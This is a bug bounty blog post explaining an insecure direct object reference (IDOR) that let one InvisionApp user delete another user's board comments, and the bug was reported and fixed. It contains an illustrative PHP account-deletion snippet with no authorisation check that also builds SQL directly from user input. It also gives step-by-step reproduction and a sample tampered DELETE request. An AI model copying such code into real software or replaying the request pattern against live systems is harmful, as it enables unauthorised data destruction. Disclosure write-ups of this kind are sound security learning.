InvisionApp IDOR [ Explained ]


InvisionApp IDOR – Bug Bounty POC

This post is published by Harsh Jaiswal as a contributor on Bug Bounty POC .Note that the post is written by Harsh Jaiswal & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest/contributor so other can also learn.If you’re interested in sharing your finding through Bug Bounty POC Platform just sign up on blog and you can post freely.

Hello Everyone out there! I’m Harsh Jaiswal, This days i’m busy with some other stuff but after a long interval of time in April i again started to hunt bugs to get some bulks for my vacation trip lol :p . When i started hunting in April, I set my aim to

What is IDOR ?

In simple words we can say, taking actions from another user’s account from your account without any interaction with user.

Why IDOR happen?

This happen when a backend have lack of authentication check, check my bellow explanation if you want to understand it

Suppose a web app is deleting user account in this way,

Delete Account form

<form method=”post” action=””>
<input type=”hidden” name=”user_id” value=”12345678″>
<input type=”submit” value=”Delete Account”>

Code working on /user/delete_account/

include “connection_db.php”;
$user_id = $_POST[‘user_id’];
$sql = “DELETE FROM user WHERE id={$user_id}”;if ($conn->query($sql) === TRUE) {
echo “User account deleted successfully”;
} else {
echo “Error deleting user account ” . $conn->error;

Okay as you seen there is no authentication check whenever a valid user_id value will be given and if it exist in DB it will be deleted which is so critical, this can be prevented in many ways like session check a password verification and many  other ways. i hope now you understood how IDOR works now please read bellow PoC.

While testing InvisionApp i came across Board section where you can make board and post in it and anyone can comment on it only ADMIN of board have rights to delete any other comment. So i created two accounts one was admin and one was normal user, and tried to delete Admin’s comment. So let me be in short bellow is the reproduction steps,

Steps to Reproduce : “A” Admin & “B” Attacker

1- Sign in from 2 different accounts ( A & B ) in 2 different browsers ( or use incognito as 2nd browser )

2- Now go to “A” account and create a board and add anything in it.

3- Comment from both “A” & “B” account.

4- Note down comment id of vitim’s comment ( Means ID of “A” )

5- Now go to “B” account, and capture the request while deleting comment of “B” account and change comment id (of “A” account) in URL ( Example : api/board/item/comment/*COMMENT ID* )

In “B” account u do not have option to delete comment of admin which is “A”

6- Status will be “200 OK” and comment should be deleted of another account

HTTP Request Example

DELETE /api/board/item/comment/*VICTIM COMMENT ID* HTTP/1.1
Connection: keep-alive
X-Timezone-Offset: -420
X-XSRF-TOKEN: dTK57p6DW5mteX-nBBanCmeza0RUvUaI1JksYSQF0cU
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36
X-Referrer-Hash: #/boards/2636413/80399396
Accept: application/json, text/plain, /
X-Page-Loaded-At: 1459747535276
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: ** Cookies Goes Here **

Bug Timeline :

3rd April : Reported Bug.

6th April : Triaged.

10th April : Given to developers to fix.

14th April : Asked to confirm the fix.

14th April : Fix confirmed by me

15th April : Rewarded with 400 USD


InvisionApp IDOR  Video PoC :







You may also like...

4 Responses

  1. It is really a nice and useful piece of information. I’m glad that you simply shared this useful info with us. Please keep us informed like this. Thank you for sharing.

  2. I just want to mention I am just beginner to weblog and honestly loved you’re page. Likely I’m want to bookmark your blog post . You absolutely come with outstanding articles. Thanks a lot for sharing with us your blog.

    • Pranob Nath says:

      Wow… nice finding… But i have a question There is no CSRF Token implemented. a CASRF attack was also possible. Don’t you think?

  3. Pranob Nath says:

    Wow… nice finding But i have a question there’s no CSRF Token implemented. A CSRF attack is also possilbe. Don’t you think?

Leave a Reply

Your email address will not be published. Required fields are marked *